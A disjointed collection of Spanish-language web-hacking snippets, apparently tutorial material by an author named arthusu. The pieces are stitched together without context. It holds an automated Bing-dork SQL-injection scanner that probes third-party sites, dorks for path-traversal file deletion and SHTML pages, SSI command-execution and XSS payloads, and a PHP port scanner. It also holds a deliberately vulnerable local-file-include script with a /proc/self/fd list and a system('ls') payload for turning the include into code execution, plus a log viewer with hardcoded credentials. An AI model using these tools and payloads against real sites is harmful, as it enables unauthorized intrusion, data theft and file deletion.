h1 {
  font-size: 38.5px;
}

h2 {
  font-size: 31.5px;
}

h3 {
  font-size: 24.5px;
}

h4 {
  font-size: 17.5px;
}

h5 {
  font-size: 14px;
}

h6 {
  font-size: 11.9px;
}

.lead {
  margin-bottom: 20px;
  font-size: 21px;
  font-weight: 200;
  line-height: 30px;
}

.pull-right {
  float: right;
  padding-right: 15px;
  padding-left: 0;
  border-right: 5px solid #eeeeee;
  border-left: 0;
}

 span12 - 940px
 span11 - 860px
 span10 - 780px
 span9 - 700px
 span8 - 620px
 span7 - 540px
 span6 - 460px
 span5 - 380px
 span4 -  300px
 span3 - 220px
 span2 - 140px
 span1 - 60px

<!DOCTYPE html>
<html lang="es">
<head>
	<meta charset="utf-8">
	<title>Contacto</title>
	<style>
		.error{
			color:red;
			font-weight: bold;
		}
		.ok{
			color:green;
			font-weight: bold;
		}
	</style>
</head>
<?php
	if(isset($_POST['submit'])){
		if(!empty($_POST['name']) && !empty($_POST['email']) && !empty($_POST['message'])){
			$nombre=$_POST['name'];
			$correo=$_POST['email'];
			$mensaje=$_POST['message'];
			$fp = fopen("logs.txt","a");
			fwrite($fp, "Nombre: $nombre \t Correo: $correo \t Mensaje: $mensaje" . PHP_EOL);
			fclose($fp);
			echo '<p class="ok">Su mensaje ha sido enviado correctamente.</p>';
		}else{
			echo '<p class="error">No ha llenado los campos correctamente.</p>';
		}
	}else{
?>
<body>
	<center>
	<h1>Formulario de contacto</h1>
	<form action="contact.php" method="post">
		<p>nombre: <input type="text" name="name" size="15" maxlength="40"></p>
		<p>correo: <input type="text" name="email" size="15" maxlength="80"></p>
		<p>mensaje: <textarea name="message"></textarea></p>
		<p><input type="submit" value="Enviar" name="submit"></p>
	</form>
	</center>
</body>
</html>
<?php
}
?>

<!DOCTYPE html>
<html lang="es">
<head>
	<meta charset="utf-8">
	<title>Contacto</title>
	<style>
		.error{
			color:red;
			font-weight: bold;
		}
		.ok{
			color:green;
			font-weight: bold;
		}
	</style>
</head>
<?php
	if(isset($_POST['submit'])){
		if(!empty($_POST['name']) && !empty($_POST['pass'])){
			$nombre=$_POST['name'];
			$password=$_POST['pass'];
			if($nombre=="arthusu" && $password=="12345"){
			echo '<h1>Bienvenido al sistema de logs</h1>';
			$file = fopen("logs.txt", "r") or exit("no se pudo abrir el archivo!");
			while(!feof($file))
			{
			echo fgets($file). "<br />";
			}
			fclose($file);
			}else{
				echo '<p class="error">El usuario o contraseña no son correctos.</p>';
			}
		}else{
			echo '<p class="error">No ha llenado los campos correctamente.</p>';
		}
	}else{
?>
<body>
	<center>
	<h1>Sistema de registros - Iniciar sesion</h1>
	<form action="login.php" method="post">
		<p>nombre: <input type="text" name="name" size="15" maxlength="40"></p>
		<p>contraseña: <input type="password" name="pass" size="15" maxlength="80"></p>
		<p><input type="submit" value="Enviar" name="submit"></p>
	</form>
	</center>
</body>
</html>
<?php
}
?>

<!DOCTYPE html>
<html lang="es">
<head>
	<meta charset="utf-8">
	<title>Contacto</title>
	<style>
		.error{
			color:red;
			font-weight: bold;
		}
		.ok{
			color:green;
			font-weight: bold;
		}
	</style>
</head>
<?php
	if(isset($_POST['submit'])){
		if(!empty($_POST['name']) && !empty($_POST['email']) && !empty($_POST['message'])){
			$nombre=htmlentities($_POST['name']);
			$correo=htmlentities($_POST['email']);
			$mensaje=htmlentities($_POST['message']);
			$fp = fopen("logs.txt","a");
			fwrite($fp, "Nombre: $nombre \t Correo: $correo \t Mensaje: $mensaje" . PHP_EOL);
			fclose($fp);
			echo '<p class="ok">Su mensaje ha sido enviado correctamente.</p>';
		}else{
			echo '<p class="error">No ha llenado los campos correctamente.</p>';
		}
	}else{
?>
<body>
	<center>
	<h1>Formulario de contacto</h1>
	<form action="contact.php" method="post">
		<p>nombre: <input type="text" name="name" size="15" maxlength="40"></p>
		<p>correo: <input type="text" name="email" size="15" maxlength="80"></p>
		<p>mensaje: <textarea name="message"></textarea></p>
		<p><input type="submit" value="Enviar" name="submit"></p>
	</form>
	</center>
</body>
</html>
<?php
}
?>

 65.99.225.171

inurl: eliminar.php?archivo=
 inurl: delete.php?file=
 inurl: delete.php?filename=

file=../../../aquielnombredelarchivoaeliminar.loquesea

<!DOCTYPE html>
<html>
<head>
	<title>try...catch</title>
	<script>
		var txt="";
		function mensaje(){
			try{
				adddlert("Bievenido invitado");
			}
			catch(e){
				txt="Ha ocurrido un error\n\n";
				txt+="Descripcion: "+ e.message+"\n\n";
				txt+="Da click aceptar para continuar\n\n";
				alert(txt);
			}
		}
	</script>
</head>
<body>
	<input type="button" value="Ver mensaje" onclick="mensaje();" />
</body>
</html>

<!DOCTYPE html>
<html>
<head>
	<title>try...throw...catch</title>
	<script>
		function myFunction(){
			try{
				var x=document.getElementById('demo').value;
				if(x=="") throw "vacio";
				if(isNaN(x)) throw "no es numero";
				if(x>10) throw "es mayor";
				if(x<5) throw "es menor";
				var y=document.getElementById('mess');
				y.innerHTML="Correcto!";
			}
			catch(e){
				var y=document.getElementById('mess');
				y.innerHTML="Error: "+ e + ".";
			}
		}
	</script>
</head>
<body>
	<h1>Detectando errores y personalizando</h1>
	<p>Porfavor introduce un numero entre 5 y 10:</p>
	<input type="text" id="demo" />
	<input type="button" onclick="myFunction();" value="Probar valor" />
	<p id="mess"></p>
</body>
</html>

<!DOCTYPE html>
<html>
<head>
	<title>Console</title>
	<script>
		function alerta(){
			adddlert("Bievenido invitado");
		}
	</script>
</head>
<body>
	<input type="button" onclick="alerta();" value="Probar!" />
</body>
</html>

<title>Buscador SQLi</title>
<style>
body{
	background-color: black;
	color:white;
	text-align: center;
	text-decoration: none;
}
.text:hover{
	text-shadow: 1px 1px 5px #fff;
}
img:hover{
	opacity:0.6;
}
a{
	text-decoration: none;
	color:red;
}
a:hover{
	text-decoration: underline;
}
</style>
<!-- Buscador SQLi basica usando bing by arthusu -->
<a href="buscador_sqli.php"><img src="http://i.imgur.com/jKXhnme.png" alt="logo" /></a><br />
<?php
/* 
+------------------------------------------------+
|   Buscador SQLi basica usando BING by arthusu  |
+------------------------------------------------+
*/
//sin limite de tiempo para ejecutar el script, puedes indicar segun gustes :P
set_time_limit(0);
//esta funcion lo que hace es conectar a la url que le indiquemos como parametro
function conectar_url($url){
	//inicia curl y lo guarda en ch
	$ch=curl_init();
	//le damos una opciones como la url
	curl_setopt($ch, CURLOPT_URL, $url);
	//le damos una opcion de que nos devuelva la pagina sea verdadero
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	//de que siga la redireccion como verdadero
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
	//de establecer un navegador en la cabecera user agent
	curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:19.0) Gecko/20100101 Firefox/19.0");
	//aqui en esta variable se guarda la pagina
	$pagina=curl_exec($ch);
	curl_close($ch);
	//devolvemos la pagina :D
	return $pagina;
}
//si existe enviar
if(isset($_POST['enviar'])){
	// y si no estan vacios los campos
	if(!empty($_POST['dork']) && !empty($_POST['paginas'])){
	//almacenamos nuestras variables
	$dork=htmlentities($_POST['dork'],ENT_QUOTES);
	$paginas=$_POST['paginas'];
	$paginas=htmlentities($paginas,ENT_QUOTES);
	//abro un archivo y guardo los logs de los dorks que insertan :D, para poder realizar esto necesitas tener permisos de escritura en la carpeta
	$archivo=fopen('dorks.txt','a');
	fwrite($archivo, "Dork insertado: ".$dork."\n");
	fclose($archivo);
	//conformamos la url
	$bing_url="http://www.bing.com/search?q=".$dork."&first=comienza";
	//i vale 1 mientras i sea menor o igual a paginas i va ir en aumento de 1 en 1
	//en caso de que el servidor no soporte demasiadas peticiones puedes modificar o limitar el numero de paginas :P
	$i=1;
	while($i<=$paginas){
		//si se encuentra "comienza" en la url entonces lo reemplazamos por el valor de i
		$url_bing=str_replace('comienza', $i, $bing_url);
		//echo $url_bing ."<br />";
		//almacenamos en una variable lo que nos retorna la busqueda
		$conectado=conectar_url($url_bing);
		//si no se encuentran resultados entonces que lo muestre
		if(preg_match("/No se encontraron resultados para/i", $conectado)){
			echo "No se encontro ningun resultado";
		}else{
			//nos conectamos a la url para que podamos verificar los enlaces
			$conectado2=conectar_url($url_bing);
			//print_r($enlaces);
			//verificamos si se encuentran enlaces
			if(preg_match_all('/<h3><a href="(.*?)"/', $conectado2,$enlaces)){
				//tenemos e que es 0 si 0 es menor a todos los enlaces entonces vamos recorriendolos
			if(!empty($_POST['checked'])){
			   for($e=0; $e<count($enlaces); $e++){
			   	//reemplazamos <h3><a href=" por vacio para que pueda verificar el error 
			    	$reemplazo=str_replace("<h3><a href=\"", "", $enlaces[0][$e]);
			    	$reemplazo=str_replace('"', "", $reemplazo);
			   		//$reemplazo=$enlaces[0][$e];
			   		//reemplazamos en =cualquiercosa por =" de manera para verificar el error
      				//$vuln=$reemplazo."'";
      				$vuln=$reemplazo;
      				$vuln2=$reemplazo." and 0";
      				//$vuln=str_replace("=","=order by 2" , $reemplazo);
      				//conectamos a la url modificada
      				$conectado3=conectar_url($vuln);
      				$conectado4=conectar_url($vuln2);
      				if($conectado3!=$conectado4){
      						echo "<br />Vulnerable: <font color='red'><a href='".htmlentities($reemplazo)."' target='_blank'>".htmlentities($reemplazo)."</a></font><br />";
      					}else{
      						echo "<br />No Vulnerable:".htmlentities($reemplazo)."<br />";
      					}
      				
   				 }
   				}else{
   					for($e=0; $e<count($enlaces); $e++){
			   	//reemplazamos <h3><a href=" por vacio para que pueda verificar el error 
			    	$reemplazo=str_replace("<h3><a href=\"", "", $enlaces[0][$e]);
			    	$reemplazo=str_replace('"', "", $reemplazo);
			   		//reemplazamos en =cualquiercosa por =" de manera para verificar el error
      				//$vuln=$reemplazo."'";
      				$vuln2=$reemplazo."\\";
      				//$vuln=str_replace("=","=order by 2" , $reemplazo);
      				//conectamos a la url modificada
      				$conectado4=conectar_url($vuln2);
 
      				//si coincide con cualquiera de estos errores decimos que es vulnerable sino pues no se le pueden ir agregando mas errores...
      				if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|Microsoft JET Database Engine error|SQL query failed|MDB2 Error|Server Error|SQL command|403 Forbidden|Warning: mysql_query|Warning: mysql_fetch_row|Warning: mysql_fetch_assoc|Warning: mysql_fetch_object|Warning: mysql_numrows|Warning: mysql_num_rows|Warning: mysql_fetch_array|Warning: pg_connect|Supplied argument is not a valid PostgreSQL result|PostgreSQL query failed: ERROR: parser: parse error|MySQL Error|MySQL ODBC|MySQL Driver|supplied argument is not a valid MySQL result resource|on MySQL result index|Oracle ODBC|Oracle Error|Oracle Driver|Oracle DB2|Microsoft JET Database Engine error|ADODB\.Command|ADODB\.Field error|Microsoft Access Driver|Microsoft VBScript runtime error|Microsoft VBScript compilation error|Microsoft OLE DB Provider for SQL Server error|OLE\/DB provider returned message|OLE DB Provider for ODBC|ODBC SQL|ODBC DB2|Oracle Error|Oracle Driver|Oracle DB2|OLE DB Provider for ODBC|ODBC SQL|ODBC DB2|ODBC Driver|ODBC Error|ODBC Microsoft Access|ODBC Oracle|JDBC SQL|JDBC Oracle|JDBC MySQL|JDBC error|JDBC Driver|Invision Power Board Database Error|DB2 ODBC|DB2 error|DB2 Driver|error in your SQL syntax|unexpected end of SQL command|invalid query|SQL command not properly ended|Error converting data type varchar to numeric|An illegal character has been found in the statement|Active Server Pages error|ASP\.NET_SessionId|ASP\.NET is configured to show verbose error messages|A syntax error has occurred|ORA-01756|Error Executing Database Query|Unclosed quotation mark|BOF or EOF|GetArray|FetchRow|Input string was not in a correct format|Warning: include|Warning: require_once|function\.include|Disallowed Parent Path|function\.require|Warning: main|Warning: session_start|Warning: getimagesize|Warning: mysql_result|Warning: pg_exec|Warning: array_merge|Warning: preg_match|Incorrect syntax near|ORA-00921: unexpected end of SQL command|Warning: ociexecute|Warning: ocifetchstatement|error ORA-/i", $conectado4)){
      					echo "<br />Vulnerable: <font color='red'><a href='".htmlentities($reemplazo)."' target='_blank'>".htmlentities($reemplazo)."</a></font><br />";
      				}else{
      					echo "No vulnerable: ".htmlentities($reemplazo)."<br />";
      				}
   				}
   			}
   		}else{
   				//si no se encontraron url entonces decimos que no coinciden con el formato
   				echo "No coincide con el formato<br />";
   			}
			
		}
		//borramos la variable url_bing para que se cree de nuevo arriba con un nuevo valor
		unset($url_bing);
		//aumentamos i a uno para que siga recorriendo las urls
		++$i;
	}
}else{
//si estan vacios los campos entonces muestra que debe llenarlos y tambien muestra el formulario de nuevo
	echo "Debes llenar los campos <br /><br />";
?>
<!-- Aqui tenemos nuestro formulario -->
	<center>
	<table border="0" width="500">
	<form action="" method="post">
	<tr><td><b><span class="text">Ingresa el dork</span></b></td><td><input type="text" name="dork" placeholder="dork"></td><tr>
	<tr><td><b><span class="text">Ingresa el numero de paginas a escanear</span></b></td><td><input type="text" name="paginas" value="5"></td></tr>
	<tr><td><input name="checked" type="checkbox"></td></tr>
	<tr><td colspan="2"><input type="submit" name="enviar"></td></tr>
	<tr><td colspan="2"><p><b><span class="text">Nota:</span></b><span class="text">: Si seleccionas el checkbox entonces dara mas resultados pero puede lanzar falsos positivos</span></p></td></tr>
	<tr><td colspan="2"><p><b><span class="text">Nota2:</span></b><span class="text">: En paginas son las paginas a escanear en el buscador en este caso bing, su paginacion seria 1,2,3,4...etc. Mi recomendacion es que lo dejen por defecto en 5 :)</span></p></td></tr>
	</form>
	<table>
	</center>
<?php
}
}else{
	//sino existe enviar muestra un mensaje y muestra el formulario de nuevo 
	echo '
	<center>
	<table border="0" width="500">
	<form action="" method="post">
	<tr><td><b><span class="text">Ingresa el dork</span></b></td><td><input type="text" name="dork" placeholder="dork"></td><tr>
	<tr><td><b><span class="text">Ingresa el numero de paginas a escanear</span></b></td><td><input type="text" name="paginas" value="5"></td></tr>
	<tr><td><input name="checked" type="checkbox"></td></tr>
	<tr><td colspan="2"><input type="submit" name="enviar"></td></tr>
	<tr><td colspan="2"><p><b><span class="text">Nota:</span></b><span class="text">: Si seleccionas el checkbox entonces dara mas resultados pero puede lanzar falsos positivos</span></p></td></tr>
	<tr><td colspan="2"><p><b><span class="text">Nota2:</span></b><span class="text">: En paginas son las paginas a escanear en el buscador en este caso bing, su paginacion seria 1,2,3,4...etc. Mi recomendacion es que lo dejen por defecto en 5 :)</span></p></td></tr>
	</form>
	<table>
	</center>
	';
}
/*
La nota mas importante es que le podemos ir agregando errores mientras vayas encontrando...
Este programa puede llegar a lanzar falsos positivos....
*/
?>

	<!--#directiva parametro=valor -->

<script>alert(1)</script>

<!--#exec cmd="ls -la"-->

inurl:bin/Cklb/ 
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=

<title>Escaner puertos</title>
<style>
	body{
		background-color: black;
		color:white;
	}
</style>
<?php
//no se cuantos puertos escanearemos entonces dejo que el script pueda ejecutarse y se tome su tiempo :P
set_time_limit(0);
//si existe enviar entonces.... que realice los siguientes procesos
if(isset($_POST['enviar'])){
	//atrapo todos los parametros del formulario y les quito xss :P
	$url=htmlentities($_POST['url'],ENT_QUOTES);
	$pi=htmlentities($_POST['pi'],ENT_QUOTES);
	$pf=htmlentities($_POST['pf'],ENT_QUOTES);
	//si no esta vacio ninguno de los campos Nota: Esto se puede validar mucho mas tanto como tu quieras...
	if(!empty($url) && !empty($pi) && !empty($pf)){
		//le muestro un mensaje con el objetivo y uno que espere mientras esta escaneando...
		echo '<h3>Objetivo:<font color="red">'.$url."</font></h3><br />";
		echo 'Espere mientras se esta escaneando puede tardar.<blink>.</blink><blink>.</blink><br />';
		//le asigno a $i el valor de pi que es el puerto inicial y mientras el puerto inicial sea menor al puerto final va aumentar de 1 a 1
		for($i=$pi;$i<=$pf;$i++){
			//si la coneccion se realizo existosamente entonces el puerto esta abierto
			//los parametros de fsockopen son la url,puerto,error coneccion,error coneccion,tiempo limite
			if($connect=@fsockopen($url,$i,$errno,$errstr,5)){
				echo '<font color="#30E319">Puerto abierto:'.$i."</font><br />";
				//cierro la coneccion
				@fclose($connect);
				//borro la variable connect se creara arriba
				unset($connect);
			}else{
			//si no se realizo la coneccion no devuelvo nada
				echo NULL;
				//echo 'Puerto cerrado:'.$i."<br />"
		}
		//libero el buffer
		flush();
	}
	}else{
		//si los campos estan vacios muestra un mensaje y el formulario
		echo '<b>Rellena los campos correctamente</b><br />';
		echo '
	<h1>MiniScanner de Puertos:</h1>
		<form action="" method="post">
			<b>Ingresa la url:</b><input name="url" type="text" value="www."><br />
			<b>Ingresa el puerto inicial:</b><input name="pi" type="text"><br />
			<b>Ingresa el puerto final:</b><input name="pf" type="text"><br />
			<input name="enviar" type="submit">
		</form>
	';
	}
}else{
	//sino existe enviar que me muestre el formulario
	echo '
	<h1>MiniScanner de Puertos:</h1>
		<form action="" method="post">
			<b>Ingresa la url:</b><input name="url" type="text" value="www."><br />
			<b>Ingresa el puerto inicial:</b><input name="pi" type="text"><br />
			<b>Ingresa el puerto final:</b><input name="pf" type="text"><br />
			<input name="enviar" type="submit">
		</form>
	';
}

?>

curl http://www.underc0de.net/myip.php | grep 'Mi IP:

cd

sudo gedit .bashrc

alias miip="curl http://www.underc0de.net/myip.php | grep 'Mi IP:'"

miip

<?php
$pagina=$_GET['pagina'];
include($pagina);
?>

/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35

<?php system('ls'); ?>

<?php
$pagina=$_GET['pagina'];
include("upload/$pagina");
?>

<?php
$pagina=$_GET['pagina'];
switch ($pagina) {
 case 'about.php':
  include('about.php');
  break;
 
 default:
  include('index.php');
  break;
?>